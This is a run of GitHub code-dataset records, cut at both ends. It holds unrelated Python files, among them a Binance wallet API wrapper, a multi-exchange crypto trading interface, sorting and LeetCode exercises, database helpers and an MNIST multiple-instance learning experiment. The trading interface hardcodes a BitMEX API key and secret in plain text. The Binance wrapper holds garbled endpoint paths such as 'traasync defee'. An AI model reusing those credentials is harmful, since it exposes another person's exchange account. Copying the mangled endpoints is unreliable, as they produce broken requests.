robot.battery_voltage,).wait_for_completed()\r\n\r\ncozmo.robot.Robot.drive_off_charger_on_connect = False\r\n\r\ncozmo.run_program(cozmo_program)\r\n","repo_name":"rsmith21/cozmo","sub_path":"Cube Battery level_working.py","file_name":"Cube Battery level_working.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26894002688","text":"from utils.util import (\n check_required_parameter,\n check_required_parameters,\n check_enum_parameter,\n)\n\n\n\nclass SpotWallet:\n async def system_status(self):\n \"\"\"System Status (System)\n Fetch system status.\n\n GET /sapi/v1/system/status\n\n https://binance-docs.github.io/apidocs/spot/en/#system-status-sapi-system\n \"\"\"\n\n return await self.query(\"/sapi/v1/system/status\")\n\n async def coin_info(self, **kwargs):\n \"\"\"All Coins' Information (USER_DATA)\n Get information of coins (available for deposit and withdraw) for user.\n\n GET /sapi/v1/capital/config/getall\n\n https://binance-docs.github.io/apidocs/spot/en/#all-coins-39-information-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/capital/config/getall\", kwargs)\n\n async def account_snapshot(self, type: str, **kwargs):\n \"\"\"Daily Account Snapshot (USER_DATA)\n\n GET /sapi/v1/accountSnapshot\n\n https://binance-docs.github.io/apidocs/spot/en/#daily-account-snapshot-user_data\n\n Parameteres:\n type -- mandatory/string -- \"SPOT\", \"MARGIN\", \"FUTURES\"\n\n Args:\n type (str): \"SPOT\", \"MARGIN\", \"FUTURES\"\n Keyword Args:\n startTime (int, optional)\n endTime (int, optional)\n limit (int, optional): min 7, max 30, async default 7\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n check_required_parameter(type, \"type\")\n payload = {\"type\": type, **kwargs}\n return await self.sign_request(\"GET\", \"/sapi/v1/accountSnapshot\", payload)\n\n async def account_status(self, **kwargs):\n \"\"\"Account Status (USER_DATA)\n Fetch account status detail.\n\n GET /sapi/v1/account/status\n\n https://binance-docs.github.io/apidocs/spot/en/#account-status-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/account/status\", kwargs)\n\n async def api_trading_status(self, **kwargs):\n \"\"\"Account API Trading Status (USER_DATA)\n Fetch account api trading status detail.\n\n GET /sapi/v1/account/apiTradingStatus\n\n https://binance-docs.github.io/apidocs/spot/en/#account-api-trading-status-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"GET\", \"/sapi/v1/account/apiTradingStatus\", kwargs\n )\n\n async def asset_detail(self, **kwargs):\n \"\"\"Asset Detail (USER_DATA)\n Fetch details of assets supported on Binance.\n\n GET /sapi/v1/asset/assetDetail\n\n https://binance-docs.github.io/apidocs/spot/en/#asset-detail-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/asset/assetDetail\", kwargs)\n\n async def trade_fee(self, **kwargs):\n \"\"\"Trade Fee (USER_DATA)\n Fetch trade fee, values in percentage.\n\n GET /sapi/v1/asset/traasync defee\n\n https://binance-docs.github.io/apidocs/spot/en/#trade-fee-sapi-user_data\n\n 
Keyword Args:\n symbol (str, optional)\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/asset/traasync defee\", kwargs)\n\n async def funding_wallet(self, **kwargs):\n \"\"\"Funding Wallet (USER_DATA)\n\n POST /sapi/v1/asset/get-funding-asset\n\n https://binance-docs.github.io/apidocs/spot/en/#funding-wallet-user_data\n\n Keyword Args:\n asset (str, optional)\n needBtcValuation (str, optional): true or false\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"POST\", \"/sapi/v1/asset/get-funding-asset\", kwargs\n )\n\n async def user_asset(self, **kwargs):\n \"\"\"User Asset (USER_DATA)\n\n Get user assets, just for positive data.\n\n Weight(IP): 5\n\n POST /sapi/v3/asset/getUserAsset\n\n https://binance-docs.github.io/apidocs/spot/en/#user-asset-user_data\n\n Keyword Args:\n asset (str, optional): If asset is blank, then query all positive assets user have.\n needBtcValuation (str, optional)\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n url_path = \"/sapi/v3/asset/getUserAsset\"\n return await self.sign_request(\"POST\", url_path, {**kwargs})\n\n async def api_key_permissions(self, **kwargs):\n \"\"\"Get API Key Permission (USER_DATA)\n\n GET /sapi/v1/account/apiRestrictions\n\n https://binance-docs.github.io/apidocs/spot/en/#get-api-key-permission-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"GET\", \"/sapi/v1/account/apiRestrictions\", kwargs\n )\n\n\n","repo_name":"majiayu000/Binance-api","sub_path":"spot/_wallet.py","file_name":"_wallet.py","file_ext":"py","file_size_in_byte":5296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70454829287","text":"import torch\nimport nvfuser_extension # noqa: F401\n\nt = torch.randn((5, 5), device='cuda')\nexpected = torch.sinh(t)\noutput = torch.ops.myop.sinh_nvfuser(t)\n\nprint(\"Expected:\", expected)\nprint(\"Output:\", output)\n\nassert torch.allclose(output, expected)\nprint(\"They match!\")\n","repo_name":"amd/ZenDNN-pytorch","sub_path":"third_party/nvfuser/examples/sinh_extension/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"17015327321","text":"from maxlib import *\nfrom binancelib import *\nfrom bitmex import *\nimport pymongo\nfrom mongo_order import *\nfrom pymongo import MongoClient\nimport urllib \nimport logging\nfrom Websocket.util.api_key import generate_nonce, generate_signature\nfrom Websocket import bitmex_websocket\nimport logging\nfrom time import sleep\nimport threading\nbitmex_api_key = 'CjyHN90eGN8Iby8Cnl6kaSJZ'\nbitmex_api_secret = 'GGcRPuh_BJvwXJmxFar9fFE5BcfzGBvxBzwyunmQMBkWKzl6'\nclass Interface():\n\tdef __init__(self):\n\t\tself.Max = MaxLib(\"\",\n\t\t\t\t\"\")\n\t\t#self.Max = MaxLib(\"\",\n\t\t#\t\t\"\")\n\t\t#self.Max = MaxLib(\"\",\n\t\t#\t\t\"\")\n\t\tself.bitmex = Bitmex('CjyHN90eGN8Iby8Cnl6kaSJZ','GGcRPuh_BJvwXJmxFar9fFE5BcfzGBvxBzwyunmQMBkWKzl6')\n\t\tself.Bin = BinanceLib(\"\",\n\t\t\t\t\"\")\n\t\tself.mongo = MongoOrder('trade','place_order')\n\tdef Order_info(self, exchange, market):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Order_process(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn 
self.Max.Order_process(market)\n\tdef Post_orders(self, exchange, market, side, volume, price, types,userID):\n\t\tneworder = {'userID':userID,'exchange':exchange,'market':market,'orderside':side,'ordertype':types,'price':price,'volume':volume,'statue':0}\n\t\tif(exchange == \"bin\"):\n\t\t\torder = self.Bin.Post_orders(market, side, str(volume), str(price), types)\n\t\telif(exchange == \"max\"):\t\t\n\t\t\torder = self.Max.Post_orders(market, side, volume, price, types)\n\t\telif(exchange == 'bitmex'):\n\t\t\torder = self.bitmex.Post_orders(market ,side,float(volume), price, types)\n\t\tneworder['orderID'] = order['orderID']\n\t\tself.mongo.AddOrder(neworder)\n\tdef ClearAll(self, exchange, market):#???\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Clear_all(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn self.Max.Orders_clear(market)\n\t\telif(exchange == \"bitmex\"):\n\t\t\treturn self.bitmex.DeleteAllOrder(market)\n\tdef DeleteOrdersByOid(self, exchange, market, idnumber):\n\t\tresult = []\n\t\tif(exchange == \"bin\"):\n\t\t\tfor i in idnumber:\n\t\t\t\tresult.append(self.Bin.Delete_orders(market,i[\"id\"]))\n\t\telif(exchange == \"max\"):\n\t\t\tfor i in idnumber:\n\t\t\t\tresult.append(self.Max.Delete_orders(i[\"id\"]))\n\t\telif(exchange == 'bitmex'):\n\t\t\tmyquery = []\n\t\t\tfor id in idnumber:\n\t\t\t\tresult.append(self.bitmex.DeleteOrder(id))\n\t\t\t\tmyquery.append(id)\n\t\tprint (myquery)\n\t\tfor id in myquery:\n\t\t\tself.mongo.DeleteByOid(id)\n\t\treturn result\n\tdef GetOrders(self, exchange, market):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Get_orders(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn self.Max.Trades_my(market, \"100\")\n\t\telif(exchange == \"bitmex\"):\n\t\t\treturn self.bitmex.GetOrder(market)\n\tdef GetOrder(self, exchange, ids):\n\t\tif(exchange == \"max\"):\n\t\t\treturn self.Max.Get_order(ids)\n\t\telif(exchange == \"bitmex\"):\n\t\t\tresult = []\n\t\t\torders = self.bitmex.GetOrder()[0]\n\t\t\tfor order in orders:\n\t\t\t\tif(order['orderid'] in ids):\n\t\t\t\t\tresult.append(order)\n\t\t\treturn result\n\tdef Account(self, exchange):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Account()\n\t\tif(exchange == \"max\"):\n\t\t\treturn self.Max.Account()\nclass MyThread(threading.Thread):\n\tdef __init__(self,key,secret,symbol,userID):\n\t\tthreading.Thread.__init__(self)\t\t\n\t\tself.ws = bitmex_websocket.BitMEXWebsocket(endpoint=\"https://testnet.bitmex.com/api/v1\", symbol = symbol,api_key = key, api_secret = secret)\n\t\tself.interface = Interface()\t\n\t\tself.symbol = symbol\n\t\tself.userid = userID\n\t\tself.mongo = MongoOrder('trade','place_order')\n\tdef run(self):\n\t\twhile(self.ws.ws.sock.connected):\n\t\t\tinfors = self.ws.GetOrder()\n\t\t\tself.ChangeOrderStatus(infors)\n\t\t\tsleep(10)\t\t\n\tdef ChangeOrderStatus(self, infors):\n\t\torders = self.interface.GetOrders('bitmex',self.symbol)[0]\n\t\tids = []\n\t\tfor infor in infors:\n\t\t\tids.append(infor['orderID'])\n\t\tfor order in orders:\n\t\t\tprint ('!')\n\t\t\tprint (order)\n\t\t\tif(order['orderid'] not in ids):\n\t\t\t\tself.mongo.UpdateStatusById(order['orderid'])\ntest = MyThread(bitmex_api_key,bitmex_api_secret,'XBTUSD','1')\ntest.start()\ninte = Interface()\n#inte.ClearAll('bitmex','2')\n#inte.GetOrderStatus('XBTUSD','1')\n#exchange, market, side, volume, price, types, marketnameindex = 
None\ninte.Post_orders('bitmex','XBTUSD','Buy',5,4002,'limit','1')\n#inte.Post_orders('bitmex','XBTUSD','Buy',5,234,'limit')\n#inte.Post_orders('bitmex','ETHUSD','Buy',5,155,'limit')\n#exchange, market, idnumber\n#print (inte.Get_orders('bitmex',''))\n#inte.DeleteOrdersByOid('bitmex','ETHUSD',['29b030cd-d57d-068f-f2c0-357d2f9a6b7b'])\n\n#inte.Clear_all('bitmex','')\n","repo_name":"jmike1211/py-cryptoTrade","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6575391551","text":"\nn, m = map(int, input().split())\na = []\nmx = 0\nmn = 1000000\nfor i in range(n):\n x = list(map(int, input().split()))\n tmpmax = max(x)\n mx = max(tmpmax, mx)\n tmpmin = min(x)\n mn = min(tmpmin, mn)\n a.append(x)\nflat = True\n\ntmp = mx-mn\n\nfor i in range(n):\n for j in range(m):\n if(tmp == a[i][j]):\n flat = False\n break\n if(flat == False):\n break\nif(flat):\n print('NOT FOUND')\nelse:\n print(tmp)\n for i in range(n):\n for j in range(m):\n if(tmp == a[i][j]):\n print(\"Vi tri [\" + str(i) + \"][\" + str(j) + \"]\")\n \n ","repo_name":"bakachanbaby/code_ptit","sub_path":"so_may_man_trong_ma_tran.py","file_name":"so_may_man_trong_ma_tran.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17790472343","text":"# Quick Sort 퀵정렬\n# 비슷한 속도를 자랑하는 병합정렬도 있음\n\n# 원리 : 기준을 설정, 큰수와 작은 수를 교환하고 리스트를 반으로 나누는 방식\n\n'''\n퀵은 Pivot피벗이란 개념을 사용\n= 큰 숫자, 작은 숫자 교환 시의 교환 기준\n\n퀵 정렬 사용 전 피벗을 어떻게 설정할 지 명시 필요\n본 코드는 Hoare Partition 호어 분할 방식을 기준으로 적용\n\n호어 분할 - 리스트에서 첫 번째 데이터를 피벗으로 정함\n1. 왼쪽에서부터 피벗보다 큰 데이터를 선택\n2. 오른쪽에서부터 피벗보다 작은 데이터를 선택\n3. 둘을 교체\n4. 반복\n5. 1과 2에서 찾은 값이 서로 순서가 엇갈리면 작은 데이터와 피벗을 교체\n(ex. 큰=5번, 작=4번)\n6. 
피벗을 제외하고 좌, 우를 각각 위 과정 반복\n\n\n보통 재귀로 구현하며, 종료 조건은 리스트 내 원소가 1개인 경우\n'''\narray = [5,7,9,0,3,1,6,2,4,8]\n\ndef quick_sort(array, start, end):\n if start >= end: #원소가 1개\n return\n pivot = start # 호어 분할\n left = start + 1\n right = end\n\n while left <= right:\n #피벗보다 큰 데이터 찾기\n while left <= end and array[left] <= array[pivot]:\n left += 1\n #피벗보다 작은 데이터\n while right > start and array[right] >= array[pivot]:\n right -= 1\n # 엇갈렸다면 교체 (피벗 - 작은데이터)\n if left > right:\n array[right], array[pivot] = array[pivot], array[right]\n else:\n array[left], array[right] = array[right],array[left]\n #분할 이후 왼쪽 + 오른쪽\n quick_sort(array, start, right -1)\n quick_sort(array, right + 1, end)\n\nquick_sort(array, 0, len(array) -1)\nprint(array)","repo_name":"rudgks8092/Book","sub_path":"CodingTest_with_Python/Chapter6_Sort/6-4(Quick).py","file_name":"6-4(Quick).py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35625096974","text":"import psycopg2\r\nimport os\r\nfrom dotenv import load_dotenv\r\n\r\n \r\ndef create_table() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n CREATE TABLE IF NOT EXISTS autoplius (\\\r\n id serial PRIMARY KEY,\\\r\n manufacturingDate int,\\\r\n engine_l float8,\\\r\n power_kw float8,\\\r\n mileage_km float8,\\\r\n gearbox_auto int,\\\r\n gearbox_manual int,\\\r\n price_euro int\\\r\n );\\\r\n \")\r\n connection.commit()\r\n return \"Table successfully created\"\r\n\r\ndef drop_table() -> str:\r\n\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n DROP TABLE IF EXISTS autoplius;\\\r\n \")\r\n connection.commit()\r\n return \"Table autoplius was successfully dropped\"\r\n\r\ndef show_table() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n SELECT * from autoplius;\\\r\n \")\r\n return cur.fetchall()\r\n\r\ndef insert_example() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"insert into autoplius(\\\r\n manufacturingDate,\\\r\n engine_l,\\\r\n power_kw, \\\r\n mileage_km, \\\r\n gearbox_auto, \\\r\n gearbox_manual, \\\r\n price_euro) \\\r\n VALUES (2016, 1.5, 70.0, 188928.0, 0, 1, 7550 ) \\\r\n \")\r\n\r\nshow_table()","repo_name":"Folkas/project_24","sub_path":"packages/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72777061289","text":"def main():\n \"\"\"This program takes in the values of the ACT scores from every state\n and creates a histogram out of them.\"\"\"\n import readscores\n import numpy as np\n import matplotlib.pyplot as plt\n\n data = readscores.read_scored(\"actsat.txt\")\n counter = 0\n act_scores = []\n while counter < len(data):\n act_scores.append(float(data[counter][\"act_average_score\"]))\n counter += 1\n plt.hist(act_scores, bins=7, edgecolor=\"black\", color=\"blue\")\n plt.yticks(np.arange(0, 21, step=5))\n plt.ylabel(\"Number of States\")\n plt.xlabel(\"score out of 36\")\n plt.title(\"Histogram of ACT Scores\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"adamponce/python_compiler","sub_path":"lab8/tests/python/scorehist.py","file_name":"scorehist.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30292314550","text":"from keras.datasets import mnist\n\nimport time\nimport os\nimport numpy as np\nimport random\nimport math\n\nimport tensorflow as tf\n\nconfig = tf.ConfigProto(allow_soft_placement=True)\nsess = tf.Session(config=config)\n\nfrom keras.models import Model\nfrom keras.layers import Input, Lambda, Dense, Conv2D, MaxPool2D, Dropout, GlobalAveragePooling2D, \\\n\tBatchNormalization, Flatten\nfrom keras.utils import to_categorical\n\nfrom keras import backend as K\n\nK.set_image_data_format('channels_first')\nK.set_session(sess)\n\nfrom loss import LossFunction as my_loss\nimport latent\n\nFV_LENGTH = 64\n\nfrom sklearn.cluster import KMeans\n\n\ndef get_model(loss_type, alpha):\n\t\"\"\"Builds simple AlexNet-like architecture\n\n Returns:\n Keras Model with adaptive loss function incorporated\n \"\"\"\n\n\t# Initialize Input parameters\n\tinput_img = Input(shape=(1, 28, 28), name='input_data')\n\tinput_feature = Input(shape=(10,), dtype='float32', name='input_feature')\n\tinput_y = Input(shape=(10,), dtype='float32', name='input_y')\n\n\t# Build simple CNN for digits classification\n\tx = Conv2D(64, (3, 3), activation='relu')(input_img)\n\tx = BatchNormalization()(x)\n\tx = MaxPool2D((2, 2))(x)\n\tx = Conv2D(32, (3, 3), activation='relu')(x)\n\tx = BatchNormalization()(x)\n\tx = MaxPool2D((2, 2))(x)\n\tx = Dropout(rate=0.2)(x)\n\tx = Flatten()(x)\n\tcnn_model = Dense(128, activation='relu')(x)\n\tcnn_model_output = Dense(10, activation='softmax', name='p_out')(cnn_model)\n\n\tloss_function = my_loss(loss_type, alpha, 10)\n\n\t# Use Lambda layer to implement our custom loss function\n\t# todo: implement custom Layer\n\toutput = Lambda(loss_function.loss_main, output_shape=(1,), name='joint_loss')(\n\t\t[input_y, cnn_model_output, input_feature])\n\n\tmibl_model = Model([input_img, input_feature, input_y], output)\n\n\treturn mibl_model\n \n\ndef minibatch_mibl_gen(x, y, batch_size, fmodel, num_instances, num_clusters=100, fraction_class=1.0):\n\t\"\"\"Generator for multiple instance learning framework\n\n Args:\n x, y: image data and labels (ndarray)\n batch_size: number of images per batch (int)\n fmodel: pretrained Keras autoencoder which outputs encoder per image (Keras Model)\n num_instances: number of images per bag (int)\n num_clusters: number of clusters to extract from latent space (int)\n fraction_class: percentage of bag which is reflective of bag label (float between 0 and 1)\n\n Returns:\n Batch containing image, label and estimated label\n \"\"\"\n\n # Get encodings from model\n\tx_latent = x.reshape((len(x), np.prod(x.shape[1:])))\n\tz_mean, z_log = fmodel.predict(x_latent, batch_size=100)\n\n\t# Perform KMeans once at start\n\tkmeans = KMeans(n_clusters=num_clusters, random_state=0).fit(z_mean)\n\tclass_mean = kmeans.cluster_centers_\n\tlabels = kmeans.labels_\n\n\twhile True:\n\n\t\ty_dense = np.argmax(y, axis=1)\n\t\tindices = np.arange(len(y))\n\t\tnp.random.shuffle(indices)\n\n\t\tnum_correct_instances = int(math.ceil(fraction_class * float(num_instances)))\n\t\tnum_random_instances = num_instances - num_correct_instances\n\n\t\tif num_correct_instances == 0:\n\t\t\traise (\"No positive labels in bag! 
We need to have a minimum of 1.\")\n\n\t\t# --------------- Setup MNIST-BAG --------------- \n\t\t# Split dataset so that a certain proportion of labels are in a bag\n\t\tif fraction_class < 1:\n\t\t\tsorted_classes = np.argsort(y_dense)\n\t\t\tif num_random_instances > 0:\n\t\t\t\tindices_toshuffle = np.array([])\n\t\t\t\tfor kdx in range(num_correct_instances, len(y_dense) - num_instances, num_instances):\n\t\t\t\t\tindices_toshuffle = np.concatenate((indices_toshuffle, np.arange(kdx, kdx + num_random_instances)),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\taxis=0)\n\n\t\t\t\tindices_toshuffle = indices_toshuffle.astype('int32')\n\t\t\t\tnp.random.shuffle(indices_toshuffle)\n\n\t\t\t\ti = 0\n\t\t\t\tfor jdx in range(num_correct_instances, len(y_dense) - num_instances, num_instances):\n\t\t\t\t\tsorted_classes[jdx: jdx + num_random_instances] = sorted_classes[\n\t\t\t\t\t\t\tindices_toshuffle[i: min(len(y_dense), i + num_random_instances)]]\n\t\t\t\t\ti = i + num_random_instances\n\n\t\t# Shuffle bags\n\t\tsorted_classes = sorted_classes.reshape(int(len(y_dense) / num_instances), num_instances)\n\t\tnp.random.shuffle(sorted_classes)\n\t\tindices = sorted_classes.flatten()\n\n\t\t# Generate new bag-level labels\n\t\tnew_y = np.zeros((len(y), 1))\n\t\tfor idx in range(0, len(y), num_instances):\n\t\t\t\t# Retrieve label for first image in bag\n\t\t\t\tmax_occ = y_dense[indices[idx]]\n\t\t\t\tnp.random.shuffle(indices[idx:idx + num_instances])\t# shuffle images\n\n\t\t\t\t# Set \"real\" weak label\n\t\t\t\tnew_y[indices[idx: idx + num_instances]] = max_occ\n\n\t\t# Perform majority vote to get estimated class label per cluster\n\t\tnew_labels = np.zeros((num_clusters), dtype='int32')\n\t\tfor a in range(0, num_clusters):\n\t\t\tlst = new_y[np.where(labels == a)[0]].squeeze().astype('int32')\n\t\t\tcounts = np.bincount(lst, minlength=10)\n\t\t\tnew_labels[a] = np.argmax(counts)\n\n\n\t\ty_c = to_categorical(new_y.flatten(), 10)\n\t\tfor start_idx in range(0, len(new_y), batch_size):\n\n\t\t\t# Gather estimated class for current batch\n\t\t\tdist_cat = to_categorical(new_labels[labels[indices[start_idx: start_idx + batch_size]]], 10)\n\n\t\t\tyield [x[indices[start_idx: start_idx + batch_size]], dist_cat,\n\t\t\t\t\ty_c[indices[start_idx: start_idx + batch_size]]], y_c[indices[start_idx: start_idx + batch_size]]\n\n\ndef train_autoencoder(vae_model, vae_name, num_epochs=500):\n\t\"\"\" Train simple (variational) autoencoder\n\n Args:\n vae_model: \"vae\", \"conv_vae\" or \"ae\" depending on what type of model is to be trained (string)\n vae_name: location and name of model once trained (string)\n num_epochs: number of epochs for training (int)\n\n Returns:\n Trained Keras Model\n \"\"\"\n\tprint(vae_model.summary())\n\n\tprint(\"Training VAE model...\")\n\tstart_time = time.time()\n\t(x_train, y_train), _ = mnist.load_data()\n\tx_train = x_train[:, np.newaxis, ...] 
/ 255.\n\tx_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:])))\n\n\tvae_model.fit(x_train, x_train, batch_size=batch_size, epochs=num_epochs)\n\tprint(\"completed in {:.3f}s\".format(time.time() - start_time))\n\t\n\tprint(\"Trained variational autoencoder.\")\n\tvae_model.save('./latent_models/mnist_ae_64f_500e.h5')\n\n\treturn vae_model\n\n\ndef run_test_example(x_test, y_test, model):\n\t\"\"\"Simple predict function\n\n Returns:\n Test accuracy rate\n \"\"\"\n\tnew_model = Model(inputs=[model.get_layer('input_data').input],\n\t\t\t\t\t\t\toutputs=[model.get_layer('p_out').output])\n\n\tpredictions = new_model.predict(x_test, batch_size=64)\n\n\ttest_accuracy = float(np.sum(np.argmax(y_test, axis=1) == np.argmax(predictions, axis=1))) / len(y_test)\n\tprint(\"test accuracy: \", test_accuracy)\n\n\treturn test_accuracy\n\n\ndef get_latent_model(encoder_type, batch_size=100, latent_dim=FV_LENGTH):\n\t\"\"\"Calls function in latent.py depending on encoder_type - see train_autoencoder(...)\n \"\"\"\n\t\n\tif encoder_type == 'vae':\n\t\tvae_model = latent.get_vae_model(batch_size, latent_dim=latent_dim)\n\t\tvae_model.load_weights('./latent_models/mnist_vae_dense.h5')\n\t\tvae_model.outputs = [vae_model.get_layer('z_mean').output]\n\t\tvae_model._make_predict_function()\n\t\tvmodel = vae_model\n\t \n\telif encoder_type == 'conv_vae':\n\t\tdeepvae_model = latent.get_convvae_model()\n\t\tdeepvae_model.load_weights('./latent_models/mnist_vae_conv.h5')\n\t\tdeepvae_model.outputs = [deepvae_model.get_layer('z_mean').output]\n\t\tdeepvae_model._make_predict_function(batch_size, latent_dim=latent_dim)\n\t\tvmodel = deepvae_model\n\t \n\telse:\n\t\tae_model = latent.get_ae_model(batch_size, latent_dim=latent_dim)\n\t\tae_model.load_weights('./latent_models/mnist_ae.h5')\n\t\tae_model.outputs = [ae_model.get_layer('z').output]\n\t\tae_model._make_predict_function()\n\t\tvmodel = ae_model\n\t\n\treturn vmodel\n\t\n\nif __name__ == \"__main__\":\n\n\tbatch_size = 100\n\tloss_type = \"cluster_class\"\n\talpha = 0.5\n\tcluster_type = 'conv_vae'\n\tnum_k_clusters = 100\n\tnum_epochs = 5\n\n\tsearch_num_instances = [5, 25, 50, 100, 200]\n\tsearch_fraction = [0.5]\n\n\tstart_time = time.time()\n\tmibl_model = get_model(loss_type, alpha)\n\n\t# presave weights so that we can set it back to original model after training (see below)\n\told_weights = mibl_model.get_weights()\n\n\t(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\tx_test = x_test[:, np.newaxis, ...] / 255.\n\tx_train = x_train[:, np.newaxis, ...] 
/ 255.\n\ty_train = to_categorical(y_train, 10)\n\ty_test = to_categorical(y_test, 10)\n \n # train latent representation and save into predefined folder\n\tdeepvae_model = latent.get_convvae_model(latent_dim=FV_LENGTH)\n\t#train_autoencoder(deepvae_model, './latent_models/mnist_convvae_64f_500e.h5')\t\t\n\n\t# throw away the decoder part of the network\n\tdeepvae_model.load_weights('./latent_models/mnist_convvae_64f_500e.h5')\n\tdeepvae_model.outputs = [deepvae_model.get_layer('z_mean').output, deepvae_model.get_layer('z_log').output]\n\tdeepvae_model._make_predict_function()\n\n\tprint(\"Training CNN...\")\n\tfor s in search_num_instances:\n\t\tfor f in search_fraction:\n\t\t\t\n\t\t\ttest_accuracy = []\n\n\t\t\t# repeat same experiment 10 times to meaure variability\n\t\t\tfor r in range(10):\n\t\t\t\tni = s\n\t\t\t\tfraction = f\n\n\t\t\t\tmibl_model.compile(loss={'joint_loss': lambda y_true, y_pred: y_pred}, optimizer=\"adam\")\n\n\t\t\t\t# Train - MNIST-BAG prepared in generator\n\t\t\t\tmibl_model.fit_generator(\n\t\t\t\t\tminibatch_mibl_gen(x_train, y_train, batch_size, deepvae_model,\n\t\t\t\t\t\t\t\t\t\t\tni, num_clusters=num_k_clusters, fraction_class=f),\n\t\t\t\t\tsteps_per_epoch=len(y_train) / batch_size,\n\t\t\t\t\tepochs=num_epochs)\n\n\t\t\t\tacc = run_test_example(x_test, y_test, mibl_model)\n\t\t\t\ttest_accuracy.append(acc)\n\t\t\t\tmibl_model.set_weights(old_weights)\n\n\t\t\tprint(\">> n = \" + str(s) + \", a = \" + str(alpha) + \", fraction = \" + str(f))\n\t\t\tprint(\"mean accuracy: {}, std accuracy: {}\".format(np.mean(np.array(test_accuracy)), np.std(np.array(test_accuracy)))) \n\n# mibl_model.save(\"./mnist_model.h5\")\n","repo_name":"shaziaakbar/cluster-mil","sub_path":"mnist-bag.py","file_name":"mnist-bag.py","file_ext":"py","file_size_in_byte":9728,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"71888510889","text":"# leetcode 1466. 
Reorder Routes to Make All Paths Lead to the City Zero\n# https://leetcode.com/problems/reorder-routes-to-make-all-paths-lead-to-the-city-zero/description/\nclass Solution:\n def minReorder(self, n: int, connections: List[List[int]]) -> int:\n roads = set()\n graph = defaultdict(set)\n\n for s, e in connections:\n roads.add((s, e))\n graph[s].add(e)\n graph[e].add(s)\n answer = 0\n q = deque()\n\n q.append((0, -1))\n\n while q:\n node, parent = q.popleft()\n if (parent, node) in roads:\n answer += 1\n\n for child in graph[node]:\n if child == parent:\n continue\n q.append((child, node))\n\n return answer","repo_name":"do0134/solostudy","sub_path":"algorithm/3월/0324/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73113857447","text":"#!/usr/bin/env python3\nimport argparse\nimport os\nimport pkgutil\nimport re\nimport sys\n\n# Don't make .pyc files\nsys.dont_write_bytecode = True\n\nscripts_dir = os.path.dirname(os.path.realpath(__file__))\nproject_dir = os.path.dirname(scripts_dir)\nbuild_dir = os.path.join(project_dir, \"build\")\n\n# Build our cmake cache\ncmake_cache = {}\n\ndirs = [build_dir]\ntry:\n dirs.extend([os.path.join(build_dir, f) for f in os.listdir(build_dir)])\nexcept FileNotFoundError:\n pass\n\nfor d in dirs:\n if os.path.isfile(os.path.join(d, \"CMakeCache.txt\")):\n with open(os.path.join(project_dir, d, \"CMakeCache.txt\"), \"r\") as f:\n cmake_cache_text = f.readlines()\n break\n\n# If we still didn't find anything\ntry:\n cmake_cache_text\nexcept NameError:\n cmake_cache_text = []\n\n# Go and process our lines in our cmake file\nfor l in 